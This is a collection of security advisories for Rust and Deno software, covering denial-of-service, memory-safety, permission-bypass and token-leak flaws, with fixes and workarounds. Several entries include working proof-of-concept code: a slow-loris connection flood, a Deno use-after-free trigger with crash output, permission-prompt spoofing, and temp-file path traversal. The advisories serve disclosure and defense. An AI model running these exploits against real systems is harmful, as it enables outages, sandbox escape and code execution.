With the default configuration of tls-listener, a malicious user can open 6.4 TcpStreams a second, sending 0 bytes, and trigger a DoS.
The default configuration options make any public service using TlsListener::new()
vulnerable to a slow-loris DoS attack.
/// Default number of concurrent handshakes
pub const DEFAULT_MAX_HANDSHAKES: usize = 64;
/// Default timeout for the TLS handshake.
pub const DEFAULT_HANDSHAKE_TIMEOUT: Duration = Duration::from_secs(10);
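The 6.4 connections-per-second figure follows directly from these two defaults; a minimal sketch of the arithmetic:

```rust
// Why the defaults above cap the listener at 6.4 handshakes/second: an
// attacker who fills all 64 handshake slots and lets each idle until the
// 10-second timeout only needs to replace slots as fast as they expire.
const DEFAULT_MAX_HANDSHAKES: usize = 64;
const DEFAULT_HANDSHAKE_TIMEOUT_SECS: f64 = 10.0;

fn main() {
    let rate = DEFAULT_MAX_HANDSHAKES as f64 / DEFAULT_HANDSHAKE_TIMEOUT_SECS;
    assert_eq!(rate, 6.4);
    println!("{rate} idle connections/second keep the listener saturated");
}
```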
Running the HTTP TLS server example (https://github.com/tmccombs/tls-listener/blob/6c57dea2d9beb1577ae4d80f6eaf03aad4ef3857/examples/http.rs) and then running the following script will prevent new connections to the server.
use std::{net::ToSocketAddrs, time::Duration};
use tokio::{io::AsyncReadExt, net::TcpStream, task::JoinSet};

#[tokio::main]
async fn main() {
    const N: usize = 1024;
    const T: Duration = Duration::from_secs(10);
    let url = "127.0.0.1:3000";
    let sockets: Vec<_> = url
        .to_socket_addrs()
        .unwrap()
        .inspect(|s| println!("{s:?}"))
        .collect();
    let mut js = JoinSet::new();
    let mut int = tokio::time::interval(T / (N as u32) / (sockets.len() as u32));
    int.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Burst);
    for _ in 0..10000 {
        for &socket in &sockets {
            int.tick().await;
            js.spawn(async move {
                let mut stream = TcpStream::connect(socket).await.unwrap();
                let _ = tokio::time::timeout(T, stream.read_to_end(&mut Vec::new())).await;
            });
        }
    }
    while js.join_next().await.is_some() {}
}
This is an instance of a slow-loris attack, and it impacts any publicly accessible service using the default configuration of tls-listener. Previous versions can mitigate this by passing a large value, such as usize::MAX, as the parameter to Builder::max_handshakes.
Wasmtime's implementation of the SIMD proposal for WebAssembly on x86_64 contained two distinct bugs in the instruction lowerings implemented in Cranelift. The aarch64 implementation of the SIMD proposal is not affected. The bugs were present in the i8x16.swizzle and select WebAssembly instructions. The select instruction is only affected when the inputs are of v128 type. The correspondingly affected Cranelift instructions were swizzle and select.
The swizzle instruction lowering in Cranelift erroneously overwrote the mask input register, which could, for example, corrupt a constant value. This means that future uses of the same constant may see a different value than the constant itself.
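For reference, the specified semantics of i8x16.swizzle can be sketched in plain Rust (illustrative only; the bug was in the register handling of the x86_64 lowering, not in these semantics):

```rust
// Reference semantics of i8x16.swizzle: output lane i selects a[s[i]],
// with out-of-range indices producing 0. The Cranelift bug did not change
// these semantics directly; it clobbered the register holding the mask
// `s`, so a constant mask reused later could be observed with a new value.
fn i8x16_swizzle(a: [u8; 16], s: [u8; 16]) -> [u8; 16] {
    let mut out = [0u8; 16];
    for i in 0..16 {
        out[i] = if (s[i] as usize) < 16 { a[s[i] as usize] } else { 0 };
    }
    out
}
```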
The select instruction lowering in Cranelift wasn't correctly implemented for vector types that are 128 bits wide. When the condition was 0, the wrong instruction was used to move the correct input to the output, meaning that only the low 32 bits were moved and the upper 96 bits of the result were left as whatever the destination register previously contained (instead of being taken from the input). The select instruction worked correctly if the condition was nonzero, however.
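The intended behavior, again as an illustrative sketch rather than Cranelift's code: the condition must select a whole 128-bit value.

```rust
// Correct semantics of `select` with v128 operands: the condition picks
// one *whole* 128-bit value. The buggy x86_64 lowering, for a condition
// of 0, copied only the low 32 bits of the correct operand and left the
// upper 96 bits of the result as stale register contents.
fn select_v128(condition: i32, a: u128, b: u128) -> u128 {
    if condition != 0 { a } else { b }
}
```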
This bug in Wasmtime's implementation of these instructions on x86_64 represents an incorrect implementation of the specified semantics of these instructions according to the WebAssembly specification. The impact of this is benign for hosts running WebAssembly but represents possible vulnerabilities within the execution of a guest program. For example a WebAssembly program could take unintended branches or materialize incorrect values internally which runs the risk of exposing the program itself to other related vulnerabilities which can occur from miscompilations.
We have released Wasmtime 0.38.1 and cranelift-codegen (and other associated cranelift crates) 0.85.1 which contain the corrected implementations of these two instructions in Cranelift.
If upgrading is not an option for you at this time, you can avoid the vulnerability by disabling the Wasm SIMD proposal:
config.wasm_simd(false);
Additionally, the bug is only present on x86_64 hosts; aarch64 hosts are not affected. Note that s390x hosts don't yet implement the SIMD proposal and are likewise not affected.
Cloudflare Quiche (through versions 0.19.1/0.20.0) was affected by an unlimited resource allocation vulnerability causing a rapid increase in memory usage on the system running a quiche server or client.
A remote attacker could take advantage of this vulnerability by repeatedly sending an unlimited number of 1-RTT CRYPTO frames after previously completing the QUIC handshake. Exploitation was possible for the duration of the connection which could be extended by the attacker.
Quiche 0.19.2 and 0.20.1 are the earliest versions containing the fix for this issue.
Cloudflare quiche was discovered to be vulnerable to unbounded storage of information related to connection ID retirement, which could lead to excessive resource consumption. Each QUIC connection possesses a set of connection identifiers (IDs); see RFC 9000 Section 5.1. Endpoints declare the number of active connection IDs they are willing to support using the active_connection_id_limit transport parameter. The peer can create new IDs using a NEW_CONNECTION_ID frame but must stay within the active ID limit. This is done by retiring old IDs: the endpoint sends a NEW_CONNECTION_ID frame that includes a value in the retire_prior_to field, which elicits a RETIRE_CONNECTION_ID frame as confirmation. An unauthenticated remote attacker can exploit the vulnerability by sending NEW_CONNECTION_ID frames and manipulating the connection (e.g. by restricting the peer's congestion window size) so that RETIRE_CONNECTION_ID frames can only be sent at a slower rate than they are received, leading to storage of information related to connection IDs in an unbounded queue.
Quiche versions 0.19.2 and 0.20.1 are the earliest to address this problem. There is no workaround for affected versions.
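Conceptually, the fix amounts to bounding this queue; a minimal sketch of that idea (illustrative, not quiche's actual data structures):

```rust
use std::collections::VecDeque;

// Illustrative sketch of a bounded retirement queue. Pre-fix behavior
// corresponds to pushing with no cap; since a well-behaved peer can never
// force more pending retirements than the ID limit allows, overflow can
// be treated as a protocol violation instead of growing without bound.
struct RetireQueue {
    pending: VecDeque<u64>, // connection ID sequence numbers to retire
    limit: usize,           // bound derived from active_connection_id_limit
}

impl RetireQueue {
    fn push(&mut self, seq: u64) -> Result<(), &'static str> {
        if self.pending.len() >= self.limit {
            return Err("connection ID retirement queue overflow");
        }
        self.pending.push_back(seq);
        Ok(())
    }
}
```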
In the wasmi interpreter, an out-of-bounds buffer write will arise if the host calls or resumes a Wasm function with more parameters than the default limit (128), as the call will overflow the value stack. This doesn't affect calls from Wasm to Wasm, only from host to Wasm.
After conducting an analysis of the dependent Polkadot systems of wasmi (Pallet Contracts, Parity Signer, and Smoldot), we have found that none of those systems are affected by the issue, as they always call host-to-Wasm functions with a small, limited number of parameters.
If you are using wasmi between versions 0.15.0 and 0.31.0, please update to the 0.31.1 patch release that we just published.
Ensure no more than 128 parameters are passed in a call from the host to a Wasm function.
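A sketch of that workaround (the guard function and its name are hypothetical; the actual call into wasmi is elided):

```rust
// Hypothetical guard for host-to-Wasm calls, enforcing the default wasmi
// value-stack parameter limit before dispatch. The actual invocation of
// the Wasm function would go where the comment is.
const MAX_HOST_CALL_PARAMS: usize = 128;

fn checked_host_call(params: &[u64]) -> Result<(), &'static str> {
    if params.len() > MAX_HOST_CALL_PARAMS {
        return Err("refusing host-to-Wasm call with more than 128 parameters");
    }
    // ... invoke the Wasm function here ...
    Ok(())
}
```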
Patch PR:
Special thanks to Stellar Development Foundation for reporting this security vulnerability.
The Apollo Router is a configurable, high-performance graph router written in Rust to run a federated supergraph that uses Apollo Federation. Affected versions are subject to a Denial-of-Service (DoS) type vulnerability. When receiving compressed HTTP payloads, affected versions of the Router evaluate the limits.http_max_request_bytes configuration option after the entirety of the compressed payload is decompressed. If affected versions of the Router receive highly compressed payloads, this could result in significant memory consumption while the compressed payload is expanded.
Router version 1.40.2 has a fix for the vulnerability.
If you are unable to upgrade, you may be able to implement mitigations at proxies or load balancers positioned in front of your Router fleet (e.g. Nginx, HAProxy, or cloud-native WAF services) by creating limits on HTTP body upload size.
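Conceptually, both the fix and the proxy-side mitigation enforce the byte limit during decompression rather than after it. A rough sketch of that pattern over any std::io::Read decoder (illustrative; not the Router's code):

```rust
use std::io::{self, Read};

// Cap the number of *decompressed* bytes: wrap the decoder in
// `Read::take` so the limit is enforced while the payload expands,
// instead of checking the size after full decompression.
fn read_bounded<R: Read>(decoder: R, max_bytes: u64) -> io::Result<Vec<u8>> {
    let mut body = Vec::new();
    // Allow one extra byte so we can distinguish "exactly at the limit"
    // from "over the limit".
    decoder.take(max_bytes + 1).read_to_end(&mut body)?;
    if body.len() as u64 > max_bytes {
        return Err(io::Error::new(
            io::ErrorKind::InvalidData,
            "decompressed body exceeds configured limit",
        ));
    }
    Ok(body)
}
```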
Use of the inherently unsafe *const c_void and ExternalPointer leads to use-after-free access of the underlying structure, resulting in arbitrary code execution.
The *const c_void and ExternalPointer (defined via the external!() macro) types are used to represent a v8::External wrapping an arbitrary void* with an external lifetime. This is inherently unsafe, as we are effectively eliding all Rust lifetime safety guarantees.
*const c_void is trivially unsafe. ExternalPointer attempts to resolve this issue by wrapping the underlying pointer with a usize marker (ExternalWithMarker<T>).
However, the marker relies on the randomness of PIE address (binary base address) which is still trivially exploitable for a non-PIE binary. It is also equally exploitable on a PIE binary when an attacker is able to derandomize the PIE address. This is problematic as it escalates an information leak of the PIE address into an exploitable vulnerability.
Note that an attacker able to control code executed inside the Deno runtime is very likely to be able to bypass ASLR by any means necessary (e.g. by chaining another vulnerability, or by using other granted permissions such as --allow-read to read /proc/self/maps).
For simplicity, we use Deno version 1.38.0, where streaming operations use *const c_void. The testing environment is the Docker image denoland/deno:alpine-1.38.0@sha256:fe51a00f4fbbaf1e72b29667c3eeeda429160cef2342f22a92c3820020d41f38, although the exact version shouldn't matter much as long as it's in 1.36.2 up to 1.38.0 (before the ExternalPointer patch; refer to the Impact section for details).
const ops = Deno[Deno.internal].core.ops;
const rid = ops.op_readable_stream_resource_allocate();
const sink = ops.op_readable_stream_resource_get_sink(rid);
// close
ops.op_readable_stream_resource_close(sink);
ops.op_readable_stream_resource_close(sink);
// reclaim BoundedBufferChannelInner
const ab = new ArrayBuffer(0x8058);
const dv = new DataView(ab);
// forge chunk contents
dv.setBigUint64(0, 2n, true);
dv.setBigUint64(0x8030, 0x1337c0d30000n, true);
// trigger segfault
Deno.close(rid);
Below is the dmesg log after the crash. We see that Deno has segfaulted on 1337c0d30008, which is +8 of what we have written at offset 0x8030. Note also that the dereferenced value will immediately be used as a function pointer, with the first argument dereferenced from offset 0x8038; it is trivial to use this to build an end-to-end exploit.
[ 6439.821046] deno[15088]: segfault at 1337c0d30008 ip 0000557b53e2fb3e sp 00007fffd485ac70 error 4 in deno[557b51714000+2d7f000] likely on CPU 12 (core 12, socket 0)
[ 6439.821054] Code: 00 00 00 00 48 85 c0 74 03 ff 50 08 49 8b 86 30 80 00 00 49 8b be 38 80 00 00 49 c7 86 30 80 00 00 00 00 00 00 48 85 c0 74 03 <ff> 50 08 48 ff 03 48 83 c4 08 5b 41 5e c3 48 8d 3d 0d 1a 59 fb 48
The same vulnerability exists for the ExternalPointer implementation, but there the attacker is required to either leak the PIE address somehow, or else exploit unexpected aliasing behavior of v8::External values. The latter has not been investigated in depth, but it is theoretically possible to alias the same underlying pointer to different v8::External values on different threads (Workers) and exploit the concurrency (RefCell may break this, though).
Use of the inherently unsafe *const c_void and ExternalPointer leads to use-after-free access of the underlying structure, which is exploitable by an attacker controlling the code executed inside a Deno runtime to obtain arbitrary code execution on the host machine regardless of permissions.
This bug is known to be exploitable for both the *const c_void and ExternalPointer implementations.
Affected versions of Deno range from 1.36.2 up to the latest release.
- *const c_void introduced in 1.36.2
- ExternalPointer in 1.38.1
- ExternalPointer introduced in 1.38.2
Use of raw file descriptors in op_node_ipc_pipe() leads to premature close of arbitrary file descriptors, allowing standard input to be re-opened as a different resource, resulting in a permission prompt bypass.
Node child_process IPC relies on the JS side to pass the raw IPC file descriptor to op_node_ipc_pipe(), which returns an IpcJsonStreamResource ID associated with the file descriptor. On closing the resource, the raw file descriptor is closed together with it.
Although closing a file descriptor is seemingly a harmless task, this has been known to be exploitable: given --allow-read and --allow-write permissions, one can open /dev/ptmx as stdin. This device happily accepts TTY ioctls and pipes anything written into it back to the reader. setuid() was used to drop permissions and deny access to /proc, since global write permissions are usually equivalent to arbitrary code execution (/proc/self/mem).
As this vulnerability conveniently allows us to close stdin (fd 0) without any FFI, we can open any resource that, when read, returns y, Y, or A as its first character (runtime/permissions/prompter.rs) to bypass the prompt.
There is a caveat, however: all stdio/stdin/stderr streams are locked, after which clear_stdin() is called. This invokes libc::tcflush(0, libc::TCIFLUSH), which fails on a non-TTY file descriptor.
This can be exploited by widening the race window between clear_stdin() and the next stdin_lock.read_line(). Notably, the prompt message contains the requested resource name (path), which is filtered by strip_ansi_codes_and_ascii_control(). This is also concatenated by write!() to make a single buffer printed out to stderr. Thus, if we request a very long resource name, the window widens, allowing us to easily and stably race another Worker that closes fd 0 and opens a resource starting with an A\n within the race window.
Note that attacker does not need any permissions to exploit this bug to a full permission prompt bypass, as Cache API can be used to create and open files with controlled content without any permissions. Refer to the Impact section for more details.
The testing environment is the Docker image denoland/deno:alpine-1.39.0@sha256:95064390f2c115673762bfc4fe15b1a7f81c859038b8c02b277ede7cd8a2ccbf.
The PoC below closes stdout (fd 1) and then prints two lines, one on stdout and one on stderr. Only the latter line is shown, as the stdout file descriptor is closed.
const ops = Deno[Deno.internal].core.ops;
// open fd 1 as ipc stream resource
const rid = ops.op_node_ipc_pipe(1);
// close resource & fd 1
Deno.close(rid);
// this should not be seen (stdout)
console.log('not seen');
// but this is seen (stderr)
console.error('seen');
Below is /proc/$(pgrep deno)/fd right after executing the last line of the above PoC. We see that fd 1 is indeed missing.
total 0
dr-x------ 2 root root 30 Dec 18 07:07 ./
dr-xr-xr-x 9 root root 0 Dec 18 07:07 ../
lrwx------ 1 root root 64 Dec 18 07:07 0 -> /dev/pts/0
l-wx------ 1 root root 64 Dec 18 07:07 10 -> 'pipe:[159305]'
lr-x------ 1 root root 64 Dec 18 07:07 11 -> 'pipe:[159306]'
l-wx------ 1 root root 64 Dec 18 07:07 12 -> 'pipe:[159306]'
lrwx------ 1 root root 64 Dec 18 07:07 13 -> /deno-dir/dep_analysis_cache_v1
l-wx------ 1 root root 64 Dec 18 07:07 14 -> 'pipe:[159305]'
l-wx------ 1 root root 64 Dec 18 07:07 15 -> 'pipe:[159306]'
lrwx------ 1 root root 64 Dec 18 07:07 16 -> /deno-dir/node_analysis_cache_v1
lrwx------ 1 root root 64 Dec 18 07:07 17 -> /dev/pts/0
lrwx------ 1 root root 64 Dec 18 07:07 18 -> /dev/pts/0
lrwx------ 1 root root 64 Dec 18 07:07 19 -> /dev/pts/0
lrwx------ 1 root root 64 Dec 18 07:07 2 -> /dev/pts/0
lrwx------ 1 root root 64 Dec 18 07:07 20 -> 'anon_inode:[eventpoll]'
lrwx------ 1 root root 64 Dec 18 07:07 21 -> 'anon_inode:[eventfd]'
lrwx------ 1 root root 64 Dec 18 07:07 22 -> 'anon_inode:[eventpoll]'
lrwx------ 1 root root 64 Dec 18 07:07 23 -> 'socket:[159302]'
lrwx------ 1 root root 64 Dec 18 07:07 24 -> 'anon_inode:[eventpoll]'
lrwx------ 1 root root 64 Dec 18 07:07 25 -> 'anon_inode:[eventfd]'
lrwx------ 1 root root 64 Dec 18 07:07 26 -> 'anon_inode:[eventpoll]'
lrwx------ 1 root root 64 Dec 18 07:07 27 -> 'socket:[159302]'
lrwx------ 1 root root 64 Dec 18 07:07 28 -> 'socket:[159310]'
lrwx------ 1 root root 64 Dec 18 07:07 29 -> 'socket:[159308]'
lrwx------ 1 root root 64 Dec 18 07:07 3 -> 'anon_inode:[eventpoll]'
lrwx------ 1 root root 64 Dec 18 07:07 30 -> 'socket:[159309]'
lrwx------ 1 root root 64 Dec 18 07:07 4 -> 'anon_inode:[eventfd]'
lrwx------ 1 root root 64 Dec 18 07:07 5 -> 'anon_inode:[eventpoll]'
lrwx------ 1 root root 64 Dec 18 07:07 6 -> 'socket:[159302]'
lrwx------ 1 root root 64 Dec 18 07:07 7 -> 'socket:[159303]'
lrwx------ 1 root root 64 Dec 18 07:07 8 -> 'socket:[159302]'
lr-x------ 1 root root 64 Dec 18 07:07 9 -> 'pipe:[159305]'
Use of raw file descriptors in op_node_ipc_pipe() leads to premature close of arbitrary file descriptors. This allows standard input (fd 0) to be closed and re-opened for a different resource, which allows a silent permission prompt bypass. This is exploitable by an attacker controlling the code executed inside a Deno runtime to obtain arbitrary code execution on the host machine regardless of permissions.
This bug is known to be exploitable: there is a working exploit that achieves arbitrary code execution by bypassing prompts from zero permissions, additionally abusing the fact that the Cache API lacks filesystem permission checks. The attack can be conducted silently, as stderr can also be closed, suppressing all prompt output.
Note that Deno's security model is currently described as follows:
- All runtime I/O is considered to be privileged and must always be guarded by a runtime permission. This includes filesystem access, network access, etc.
- The only exception to this is runtime storage explosion attacks that are isolated to a part of the file system, caused by evaluated code (for example, caching big dependencies or no limits on runtime caches such as the Web Cache API).
Although it is ambiguous whether the fundamental lack of file system permission checks on the Web Cache API is a vulnerability or not, the reporter has not reported this as a vulnerability, assuming that it is a known risk (or a feature).
The affected version of Deno is 1.39.0.
Deno improperly checks that an import specifier's hostname is equal to or a child of a token's hostname, which can cause tokens to be sent to servers they shouldn't be sent to. An auth token intended for example.com may be sent to notexample.com.
auth_tokens.rs uses a simple ends_with check, which matches www.deno.land to a deno.land token as intended, but also matches im-in-ur-servers-attacking-ur-deno.land to deno.land tokens.
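The flaw and its fix can be sketched as follows (illustrative; not the actual auth_tokens.rs code):

```rust
// The naive check matches any hostname that merely ends with the token
// host; a correct check additionally requires an exact match or a label
// boundary ('.') immediately before the suffix.
fn naive_match(host: &str, token_host: &str) -> bool {
    host.ends_with(token_host)
}

fn correct_match(host: &str, token_host: &str) -> bool {
    host == token_host
        || host
            .strip_suffix(token_host)
            .map_or(false, |rest| rest.ends_with('.'))
}
```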
To reproduce against a PoC host such as denovulnpoc.example.com, run DENO_AUTH_TOKENS=a1b2c3d4e5f6@left-truncated.domain deno run https://not-a-left-truncated.domain; for example, DENO_AUTH_TOKENS=a1b2c3d4e5f6@poc.example.com deno run https://denovulnpoc.example.com sends the poc.example.com token to denovulnpoc.example.com.
Anyone who uses DENO_AUTH_TOKENS and imports potentially untrusted code is affected.
This advisory has been withdrawn because it is a duplicate of GHSA-3qx3-6hxr-j2ch. This link is maintained to preserve external references.
Buffer overflow vulnerability in eza before version 0.18.2 allows local attackers to execute arbitrary code via the .git/HEAD, .git/refs, and .git/objects components.
A maliciously crafted permission request can show the spoofed permission prompt by inserting a broken ANSI escape sequence into the request contents.
In the patch for CVE-2023-28446, Deno is stripping any ANSI escape sequences from the permission prompt, but permissions given to the program are based on the contents that contain the ANSI escape sequences.
For example, requesting the read permission with /tmp/hello\u001b[/../../etc/hosts as a path will display /tmp/hellotc/hosts in the permission prompt, but the actual permission given to the program is for /tmp/hello\u001b[/../../etc/hosts, which is /etc/hosts after normalization.
This difference allows a malicious Deno program to spoof the contents of the permission prompt.
Run the following JavaScript and observe that /tmp/hellotc/hosts is displayed in the permission prompt instead of /etc/hosts, although Deno gives access to /etc/hosts.
const permission = { name: "read", path: "/tmp/hello\u001b[/../../etc/hosts" };
await Deno.permissions.request(permission);
console.log(await Deno.readTextFile("/etc/hosts"));
┌ ⚠️ Deno requests read access to "/etc/hosts".
├ Requested by `Deno.permissions.query()` API
├ Run again with --allow-read to bypass this prompt.
└ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all read permissions) >
┌ ⚠️ Deno requests read access to "/tmp/hellotc/hosts".
├ Requested by `Deno.permissions.query()` API
├ Run again with --allow-read to bypass this prompt.
└ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all read permissions) >
Any Deno program can spoof the content of the interactive permission prompt by inserting a broken ANSI code, which allows a malicious Deno program to display the wrong file path or program name to the user.
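The displayed-versus-granted mismatch can be modeled with a small stripper (illustrative; not Deno's actual code, which lives in Rust but with different internals):

```rust
// Minimal model of the mismatch: the prompt shows the *stripped* string
// while permission is granted on the *raw* one. CSI sequences start with
// ESC '[' and consume bytes until a final byte in 0x40..=0x7E, which is
// how the broken sequence "\x1b[/../../e" swallows the "/../../e" that
// follows it.
fn strip_csi(input: &str) -> String {
    let mut out = String::new();
    let mut chars = input.chars().peekable();
    while let Some(c) = chars.next() {
        if c == '\u{1b}' && chars.peek() == Some(&'[') {
            chars.next(); // consume '['
            while let Some(n) = chars.next() {
                if ('\u{40}'..='\u{7e}').contains(&n) {
                    break; // final byte terminates the sequence
                }
            }
        } else {
            out.push(c);
        }
    }
    out
}

fn main() {
    let granted = "/tmp/hello\u{1b}[/../../etc/hosts"; // what gets normalized
    let displayed = strip_csi(granted);                // what the prompt shows
    assert_eq!(displayed, "/tmp/hellotc/hosts");
}
```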
A vulnerability in Deno's Node.js compatibility runtime allows for cross-session data contamination during simultaneous asynchronous reads from Node.js streams sourced from sockets or files. The issue arises from the re-use of a global buffer (BUF) in stream_wrap.ts used as a performance optimization to limit allocations during these asynchronous read operations. This can lead to data intended for one session being received by another session, potentially resulting in data corruption and unexpected behavior.
A bug in Deno's Node.js compatibility runtime results in data cross-reception during simultaneous asynchronous reads from Node.js network streams. When multiple independent network socket connections are involved, this vulnerability can be triggered. For instance, two separate server sockets that receive data from their respective client sockets and then echo the received data back to the client using Node.js streams may experience an issue where data from one socket may appear on another socket. Due to the improper isolation of the global buffer (BUF), data sent by one socket can end up being incorrectly received by another socket. Consequently, data intended for one session may be exposed to another session, potentially leading to data corruption and unexpected behavior.
This buffer was introduced as a performance optimization to avoid excessive allocations during network read operations.
In cases where the net.Stream is connected to a remote server such as a database or key/value store such as Redis, this may result in a packet received on one connection being presented to another, causing data cross-contamination between multiple users and potentially leaking sensitive information.
It is important to note that this vulnerability does not affect Deno network streams created with the Deno.listen and Deno.connect APIs.
The impact of this issue may extend beyond Node.js network streams, however, and may also affect asynchronous reads from non-network Node.js streams, such as those created from files.
https://github.com/denoland/deno/issues/20188
This affects all users of Deno that use the node.js compatibility layer for network communication or other streams, including packages that may require node.js libraries indirectly.
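A minimal single-threaded model of the shared-buffer hazard (illustrative; not Deno's code) shows how one session can observe another's bytes:

```rust
use std::cell::RefCell;

// Two logical sessions stage socket reads in one shared buffer,
// analogous to BUF in stream_wrap.ts. If session B's read lands before
// session A consumes its data, A observes B's bytes.
thread_local! {
    static BUF: RefCell<[u8; 4]> = RefCell::new([0; 4]);
}

fn read_into_shared(data: &[u8; 4]) {
    BUF.with(|b| b.borrow_mut().copy_from_slice(data));
}

fn consume_shared() -> [u8; 4] {
    BUF.with(|b| *b.borrow())
}

fn main() {
    read_into_shared(b"AAAA"); // session A's read completes
    read_into_shared(b"BBBB"); // session B's read reuses the same buffer
    assert_eq!(&consume_shared(), b"BBBB"); // A now sees B's data
}
```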
Insufficient validation of parameters in the Deno.makeTemp* APIs would allow for creation of files outside of the allowed directories. This may allow the user to overwrite important files on the system that may affect other systems.
A user may provide a prefix or suffix to a Deno.makeTemp* API containing path traversal characters. The permission check would prompt for the base directory of the API, but the final file that was created would be outside of this directory:
$ mkdir /tmp/good
$ mkdir /tmp/bad
$ deno repl --allow-write=/tmp/good
> Deno.makeTempFileSync({ dir: "/tmp/bad" })
┌ ⚠️ Deno requests write access to "/tmp/bad".
├ Requested by `Deno.makeTempFile()` API.
├ Run again with --allow-write to bypass this prompt.
└ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all write permissions) > n
❌ Denied write access to "/tmp/bad".
Uncaught PermissionDenied: Requires write access to "/tmp/bad", run again with the --allow-write flag
at Object.makeTempFileSync (ext:deno_fs/30_fs.js:176:10)
at <anonymous>:1:27
> Deno.makeTempFileSync({ dir: "/tmp/good", prefix: "../bad/" })
"/tmp/good/../bad/a9432ef5"
$ ls -l /tmp/bad/a9432ef5
-rw-------@ 1 user group 0 Mar 4 09:20 /tmp/bad/a9432ef5
This is fixed in Deno 1.41.1.
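The underlying issue is that the prefix/suffix were joined onto the permission-checked directory without validation. A hypothetical check (illustrative; names are not Deno's internal API, and this is not the actual patch):

```rust
// Reject prefixes/suffixes containing path separators or traversal
// components before joining them onto the permission-checked directory.
fn is_safe_affix(affix: &str) -> bool {
    !affix.contains('/') && !affix.contains('\\') && affix != ".." && affix != "."
}
```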
When using named pipes on Windows, mio will under some circumstances return invalid tokens that correspond to named pipes that have already been deregistered from the mio registry. The impact of this vulnerability depends on how mio is used. For some applications, invalid tokens may be ignored or cause a warning or a crash. On the other hand, for applications that store pointers in the tokens, this vulnerability may result in a use-after-free.
For users of Tokio, this vulnerability is serious and can result in a use-after-free in Tokio.
The vulnerability is Windows-specific, and can only happen if you are using named pipes. Other IO resources are not affected.
This vulnerability has been fixed in mio v0.8.11.
All versions of mio between v0.7.2 and v0.8.10 are vulnerable.
Tokio is vulnerable when you are using a vulnerable version of mio AND you are using at least Tokio v1.30.0. Versions of Tokio prior to v1.30.0 will ignore invalid tokens, so they are not vulnerable.
Vulnerable libraries that use mio can work around this issue by detecting and ignoring invalid tokens.
When an IO resource registered with mio has a readiness event, mio delivers that readiness event to the user using a user-specified token. Mio guarantees that when an IO resource is deregistered, it will never return the token for that IO resource again. However, for named pipes on Windows, mio may sometimes deliver the token for a named pipe even though the named pipe has been previously deregistered.
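The workaround suggested for libraries, ignoring tokens that no longer map to a registered resource, can be sketched as follows (illustrative; not mio's API):

```rust
use std::collections::HashMap;

// Illustrative model of the defensive pattern: the reactor keeps its own
// token -> resource map and drops readiness events whose token no longer
// resolves, instead of trusting the token blindly (which, in
// pointer-carrying designs like Tokio's, would mean touching freed state).
struct Reactor {
    resources: HashMap<usize, String>, // token -> per-resource state
}

impl Reactor {
    fn on_ready(&self, token: usize) -> Option<&String> {
        // A stale token (already deregistered) yields None and is ignored.
        self.resources.get(&token)
    }
}
```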
This vulnerability was originally reported in the Tokio issue tracker: tokio-rs/tokio#6369. It was fixed in tokio-rs/mio#1760. This vulnerability is also known as RUSTSEC-2024-0019.
Thank you to @rofoun and @radekvit for discovering and reporting this issue.
This advisory has been withdrawn because it is a duplicate of GHSA-x7vr-c387-8w57. This link is maintained to preserve external references.
HeaderMap::reserve() used usize::next_power_of_two() to calculate the increased capacity. However, next_power_of_two() silently overflows to 0 if given a sufficiently large number in release mode.
If the map was not empty when the overflow happens, the library will invoke self.grow(0) and start infinite probing. This allows an attacker who controls the argument to reserve() to cause a potential denial of service (DoS).
The flaw was corrected in 0.1.20 release of http crate.
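The overflow is straightforward to observe on a 64-bit target; the checked variant makes it visible portably, since the plain method panics in debug builds and wraps to 0 only in release builds:

```rust
// Once the argument exceeds 2^63 (on 64-bit usize) there is no
// representable power of two >= it: next_power_of_two() panics in debug
// builds but silently wraps to 0 in release builds, which is what fed
// self.grow(0) in affected http versions.
fn main() {
    let requested: usize = (1 << 63) + 1;
    assert_eq!(requested.checked_next_power_of_two(), None); // wraps to 0 in release
    // A smaller request behaves normally:
    assert_eq!(1000usize.checked_next_power_of_two(), Some(1024));
}
```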
The libc getgrouplist function takes an in/out parameter ngroups specifying the size of the group buffer. When the buffer is too small to hold all of the requested user's group memberships, some libc implementations, including glibc and Solaris libc, will modify ngroups to indicate the actual number of groups for the user, in addition to returning an error. The version of nix::unistd::getgrouplist in nix 0.16.0 and up will resize the buffer to twice its size, but will not read or modify the ngroups variable. Thus, if the user has more than twice as many groups as the initial buffer size of 8, the next call to getgrouplist will then write past the end of the buffer.
The issue would require editing /etc/group to exploit, which is usually only editable by the root user.
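The correct calling pattern can be modeled in plain Rust (the function below only mimics the libc in/out contract described above; it is not the real getgrouplist):

```rust
// Model of the getgrouplist contract: on failure, some libcs write the
// *required* group count back through `ngroups`. The fix is to resize to
// that reported value; the buggy nix code doubled the buffer but never
// re-read `ngroups`, so libc's next write could run past the buffer.
fn fake_getgrouplist(actual: usize, buf: &mut [i32], ngroups: &mut usize) -> i32 {
    if *ngroups < actual {
        *ngroups = actual; // report how many slots are needed
        return -1;
    }
    for (i, slot) in buf.iter_mut().take(actual).enumerate() {
        *slot = i as i32;
    }
    *ngroups = actual;
    0
}

fn groups_for_user(actual: usize) -> Vec<i32> {
    let mut ngroups = 8; // nix's initial buffer size
    let mut buf = vec![0; ngroups];
    while fake_getgrouplist(actual, &mut buf, &mut ngroups) == -1 {
        buf.resize(ngroups, 0); // resize to the reported size, then retry
    }
    buf.truncate(ngroups);
    buf
}
```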